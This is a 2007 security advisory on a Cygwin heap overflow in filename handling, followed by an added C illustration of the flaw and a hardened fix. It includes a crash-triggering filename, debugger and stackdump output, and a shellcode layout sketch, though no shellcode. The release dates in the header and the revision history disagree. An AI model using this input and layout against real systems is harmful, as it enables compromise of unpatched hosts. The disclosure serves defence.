
cygwin-overflow.txt

Date: 27 Nov 2007. Reported by Jesus Olmos Gonzalez. Type: packetstorm. Source: packetstormsecurity.com

Cygwin buffer overflow vulnerability discovered by Jesus Olmos Gonzalez with severity 5/5, allowing filenames longer than 239 bytes, leading to heap overflow and compromising systems. Patch available at http://www.cygwin.com/snapshot

Code
=============================================
INTERNET SECURITY AUDITORS ALERT 2007-005  
- Original release date: May 23rd, 2007  
- Last revised: November 24th, 2007  
- Discovered by: Jesus Olmos Gonzalez  
- Severity: 5/5  
=============================================  
  
I. VULNERABILITY  
-------------------------  
Cygwin buffer overflow in the filename length check  
  
II. BACKGROUND  
-------------------------  
Cygwin is a Linux-like environment for Windows which consists of a DLL
binary (cygwin1.dll) that emulates the Linux API, and a set of tools
which provide the Linux look and feel.
  
Sometimes administrators rely on Cygwin's security in order to
expose a daemon to the network (sshd, telnetd, ftpd ...) running over Cygwin.
  
III. DESCRIPTION  
-------------------------  
Traditionally, Linux filesystems allow filenames up to 255 bytes long;
Cygwin, however, allows 239 bytes, and there is a check that rejects
filenames of 240 bytes or more.
  
In spite of the check, the filename is stored in a 232-byte dynamically
allocated buffer, so it is possible to craft a malicious filename of
233 to 239 bytes that passes the check and overflows the heap by up to
7 bytes.
  
So an attacker first has to get onto the machine and place the malicious
file; then 7 bytes of the private heap and the ebx and edi registers are
under the exploit's control.
  
The following file has to be uploaded; if touch is used to create it,
Cygwin suffers the buffer overflow.
  
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYY  
  
...  
  
$ cat scp.exe.stackdump  
Exception: STATUS_ACCESS_VIOLATION at eip=6109008D  
eax=6167343A ebx=5959595A ecx=6167343C edx=04A96F89 esi=6E6C0055  
edi=59595957  
ebp=6E6C006C esp=0022E51B program=C:\sshd\bin\scp.exe  
cs=001B ds=0023 es=0023 fs=0038 gs=0000 ss=0023  
  
$ gdb /usr/bin/touch.exe  
GNU gdb 2003-09-20-cvs (cygwin-special)  
...  
(gdb) r AAAA ...  
Program received signal SIGSEGV, Segmentation fault.  
0x61091eea in getppid () from /usr/bin/cygwin1.dll  
(gdb) x/i 0x61091eea  
0x61091eea <getppid+2954>: mov 0xc(%ebp),%eax  
(gdb) i r ebp eax  
ebp 0x22006b 0x22006b  
eax 0xffffffff -1  
  
filename: [nops][shellcode][jmp][buff]  
nops + shellcode = 210 bytes  
jmp = 4 bytes  
buff = 24 bytes  
  
IV. PROOF OF CONCEPT  
-------------------------  
Not public.  
  
V. BUSINESS IMPACT  
-------------------------  
Systems could be compromised by exploiting this vulnerability.
  
VI. SYSTEMS AFFECTED  
-------------------------  
All cygwin1.dll versions up to 1.5.7.
It is possible that versions from 1.5.7 to 1.5.19 are vulnerable too, due to
bad use of the name length constants in the Cygwin code.
  
VII. SOLUTION  
-------------------------  
The patch is available at http://www.cygwin.com/snapshots
The latest version (1.5.24) does not have this problem.
  
VIII. REFERENCES  
-------------------------  
http://www.cygwin.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered and reported  
by Jesus Olmos Gonzalez (jolmos (at) isecauditors=dot=com)  
  
X. REVISION HISTORY  
-------------------------  
May 23, 2006: Initial release  
August 06, 2007: First Revision  
November 23, 2007: Last Revision  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
May 23, 2006: Vulnerability acquired by  
Jesus Olmos Gonzalez (Internet Security Auditors)  
November 08, 2007: First vendor notification and discussion on the devel
list about its impact. Considered collaterally corrected.
November 24, 2007: Published.  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"  
with no warranties or guarantees of fitness of use or otherwise.  
Internet Security Auditors, S.L. accepts no responsibility for any  
damage caused by the use or misuse of this information.  
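Section III of the advisory describes the root cause: a filename length check that rejects names of 240 bytes or more, while the heap buffer the name is copied into holds only 232 bytes, so names of 233 to 239 bytes pass the check and overrun the buffer by up to 7 bytes. The C program below is an added illustration of that defect class and of its fix; it is not Cygwin's code (the function and constant names here are made up for the illustration), and it models the overrun arithmetically rather than performing an out-of-bounds write. The hardened variant derives its only limit from the destination size, so the check and the allocation cannot drift apart.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Figures taken from the advisory: the check rejects names of 240 bytes or
 * more, but the heap buffer the name is stored in is only 232 bytes long.
 * The identifiers below are hypothetical, not Cygwin's own. */
#define NAME_LEN_REJECT 240   /* check: reject len >= 240 */
#define NAME_BUF_SIZE   232   /* buffer actually allocated */

/* Build a constructed test name of n bytes filled with 'A' (caller frees). */
char *make_name(size_t n) {
    char *s = malloc(n + 1);
    if (s == NULL) return NULL;
    memset(s, 'A', n);
    s[n] = '\0';
    return s;
}

/* Mirrors the flawed pattern: validate against one constant, store in a
 * buffer sized by another. Instead of copying, it returns how many bytes a
 * copy of `name` would write past the 232-byte buffer: -1 if the check
 * rejects the name, 0 if it fits, otherwise the overrun (1..7 for names of
 * 233..239 bytes, matching the advisory's "maximum 7 bytes"). */
int overflow_bytes_with_mismatched_check(const char *name) {
    size_t len = strlen(name);
    if (len >= NAME_LEN_REJECT) return -1;       /* the check fires */
    if (len > NAME_BUF_SIZE) return (int)(len - NAME_BUF_SIZE);
    return 0;
}

/* Hardened variant: the destination size is the only limit, the scan never
 * runs past what could fit, and the terminator is accounted for.
 * Returns 0 and copies on success, -1 if the name does not fit. */
int safe_store_name(const char *name, char *dst, size_t dst_size) {
    if (name == NULL || dst == NULL || dst_size == 0) return -1;
    size_t len = 0;
    while (len < dst_size && name[len] != '\0') len++;  /* bounded scan */
    if (len >= dst_size) return -1;            /* no room left for the NUL */
    memcpy(dst, name, len);
    dst[len] = '\0';
    return 0;
}

/* Convenience wrappers: build an n-byte name and apply each variant. */
int mismatched_result(size_t n) {
    char *name = make_name(n);
    if (name == NULL) return -2;
    int r = overflow_bytes_with_mismatched_check(name);
    free(name);
    return r;
}

int hardened_result(size_t n) {
    char dst[NAME_BUF_SIZE];
    char *name = make_name(n);
    if (name == NULL) return -2;
    int r = safe_store_name(name, dst, sizeof dst);
    free(name);
    return r;
}

int main(void) {
    size_t lens[] = {200, 232, 233, 239, 240};
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        printf("%3zu-byte name: mismatched check -> %2d, hardened -> %2d\n",
               lens[i], mismatched_result(lens[i]), hardened_result(lens[i]));
    }
    return 0;
}
```

Running it shows the gap the advisory describes: the mismatched check lets a 233-byte name through with a 1-byte overrun and a 239-byte name with a 7-byte overrun, and only stops at 240. The hardened variant rejects everything from 232 bytes upward because it counts the terminating NUL against the 232-byte destination, which is the conservative side to err on when two constants disagree.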
